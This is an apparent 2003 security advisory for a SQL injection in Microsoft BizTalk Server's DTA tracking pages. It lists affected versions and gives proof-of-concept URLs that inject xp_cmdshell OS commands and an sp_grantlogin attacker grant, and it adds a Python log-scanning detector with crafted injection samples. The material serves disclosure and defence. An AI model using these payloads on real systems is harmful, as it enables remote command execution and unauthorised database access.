Title Microsoft BizTalk Server DTA Interface SQL Injection Vulnerability
Published 2003-04-30-12:00AM
Updated 2003-05-05-09:16PM
Class Input Validation Error
CVE   CAN-2003-0118
Remote  Yes
Local  No
Credit  Discovery credited to Cesar Cerrudo.
Vulnerable
  Microsoft BizTalk Server 2002 Enterprise Edition
    Microsoft Windows 2000 Advanced Server SP2
    Microsoft Windows 2000 Server SP2
    Microsoft Windows XP Professional
  Microsoft BizTalk Server 2002 Developer Edition
    Microsoft Windows 2000 Advanced Server
    Microsoft Windows 2000 Advanced Server SP1
    Microsoft Windows 2000 Advanced Server SP2
    Microsoft Windows 2000 Server
    Microsoft Windows 2000 Server SP1
    Microsoft Windows 2000 Server SP2
  Microsoft BizTalk Server 2000 Standard Edition SP2
    Microsoft Windows 2000 Advanced Server
    Microsoft Windows 2000 Advanced Server SP1
    Microsoft Windows 2000 Advanced Server SP2
    Microsoft Windows 2000 Professional
    Microsoft Windows 2000 Professional SP1
    Microsoft Windows 2000 Professional SP2
    Microsoft Windows 2000 Server
    Microsoft Windows 2000 Server SP1
    Microsoft Windows 2000 Server SP2
  Microsoft BizTalk Server 2000 Standard Edition SP1a
    Microsoft Windows 2000 Advanced Server
    Microsoft Windows 2000 Advanced Server SP1
    Microsoft Windows 2000 Advanced Server SP2
    Microsoft Windows 2000 Professional
    Microsoft Windows 2000 Professional SP1
    Microsoft Windows 2000 Professional SP2
    Microsoft Windows 2000 Server
    Microsoft Windows 2000 Server SP1
    Microsoft Windows 2000 Server SP2
  Microsoft BizTalk Server 2000 Standard Edition
    Microsoft Windows 2000 Advanced Server SP1
    Microsoft Windows 2000 Advanced Server SP2
    Microsoft Windows 2000 Professional SP1
    Microsoft Windows 2000 Professional SP2
    Microsoft Windows 2000 Server SP1
    Microsoft Windows 2000 Server SP2
  Microsoft BizTalk Server 2000 Enterprise Edition SP2
    Microsoft Windows 2000 Advanced Server
    Microsoft Windows 2000 Advanced Server SP1
    Microsoft Windows 2000 Advanced Server SP2
    Microsoft Windows 2000 Professional
    Microsoft Windows 2000 Professional SP1
    Microsoft Windows 2000 Professional SP2
    Microsoft Windows 2000 Server
    Microsoft Windows 2000 Server SP1
    Microsoft Windows 2000 Server SP2
  Microsoft BizTalk Server 2000 Enterprise Edition SP1a
    Microsoft Windows 2000 Advanced Server
    Microsoft Windows 2000 Advanced Server SP1
    Microsoft Windows 2000 Advanced Server SP2
    Microsoft Windows 2000 Professional
    Microsoft Windows 2000 Professional SP1
    Microsoft Windows 2000 Professional SP2
    Microsoft Windows 2000 Server
    Microsoft Windows 2000 Server SP1
    Microsoft Windows 2000 Server SP2
  Microsoft BizTalk Server 2000 Enterprise Edition
    Microsoft Windows 2000 Advanced Server SP1
    Microsoft Windows 2000 Advanced Server SP2
    Microsoft Windows 2000 Professional SP1
    Microsoft Windows 2000 Professional SP2
    Microsoft Windows 2000 Server SP1
    Microsoft Windows 2000 Server SP2
  Microsoft BizTalk Server 2000 Developer Edition SP2
    Microsoft Windows 2000 Advanced Server
    Microsoft Windows 2000 Advanced Server SP1
    Microsoft Windows 2000 Advanced Server SP2
    Microsoft Windows 2000 Professional
    Microsoft Windows 2000 Professional SP1
    Microsoft Windows 2000 Professional SP2
    Microsoft Windows 2000 Server
    Microsoft Windows 2000 Server SP1
    Microsoft Windows 2000 Server SP2
  Microsoft BizTalk Server 2000 Developer Edition SP1a
    Microsoft Windows 2000 Advanced Server
    Microsoft Windows 2000 Advanced Server SP1
    Microsoft Windows 2000 Advanced Server SP2
    Microsoft Windows 2000 Professional
    Microsoft Windows 2000 Professional SP1
    Microsoft Windows 2000 Professional SP2
    Microsoft Windows 2000 Server
    Microsoft Windows 2000 Server SP1
    Microsoft Windows 2000 Server SP2
  Microsoft BizTalk Server 2000 Developer Edition
    Microsoft Windows 2000 Advanced Server SP1
    Microsoft Windows 2000 Advanced Server SP2
    Microsoft Windows 2000 Professional SP1
    Microsoft Windows 2000 Professional SP2
    Microsoft Windows 2000 Server SP1
    Microsoft Windows 2000 Server SP2
Not Vulnerable  
Code   The following proof of concept was submitted:
http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--

http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--

http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.sp_grantlogin 'domainattacker'--

http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.sp_grantlogin 'domainattacker'--
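
Detection  Added example, not part of the original advisory: a log check for requests to the two DTA pages named above whose nDocumentKey value is not a plain integer. It assumes IIS W3C extended logs with the cs-uri-stem and cs-uri-query fields enabled, and assumes legitimate document keys are integers; the sample log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Pages named in the proof of concept; compared case-insensitively as IIS does.
DTA_PAGES = {"/biztalktracking/rawdocdata.asp",
             "/biztalktracking/rawcustomsearchfield.asp"}
INTEGER = re.compile(r"-?\d{1,10}")  # assumption: a valid key is a plain integer

def parse_w3c(lines):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def document_key(query):
    """Return the decoded nDocumentKey value, or None if the parameter is absent."""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name).lower() == "ndocumentkey":
            return unquote_plus(value)
    return None

def suspicious_requests(lines):
    """Return (client, page, key) for DTA requests whose key is not a plain integer."""
    hits = []
    for rec in parse_w3c(lines):
        page = rec.get("cs-uri-stem", "").lower()
        if page not in DTA_PAGES:
            continue
        key = document_key(rec.get("cs-uri-query", "-"))
        if key is not None and not INTEGER.fullmatch(key):
            hits.append((rec.get("c-ip"), page, key))
    return hits

# Constructed sample log (documentation-range addresses), not from a real server.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-05-01 10:00:01 192.0.2.10 GET /biztalktracking/rawdocdata.asp nDocumentKey=1042 200
2003-05-01 10:00:07 198.51.100.7 GET /biztalktracking/RawCustomSearchField.asp nDocumentKey=1,@tnDirection=1;-- 200
2003-05-01 10:00:09 198.51.100.7 GET /biztalktracking/rawdocdata.asp nDocumentKey=7%2C%40tnDirection%3D1 500
2003-05-01 10:00:12 192.0.2.10 GET /default.asp id=abc 200
""".splitlines()
```

The check validates the parameter's type instead of matching SQL keywords, so URL-encoded variants of the same request are flagged as well.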
Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:42:58 +0000
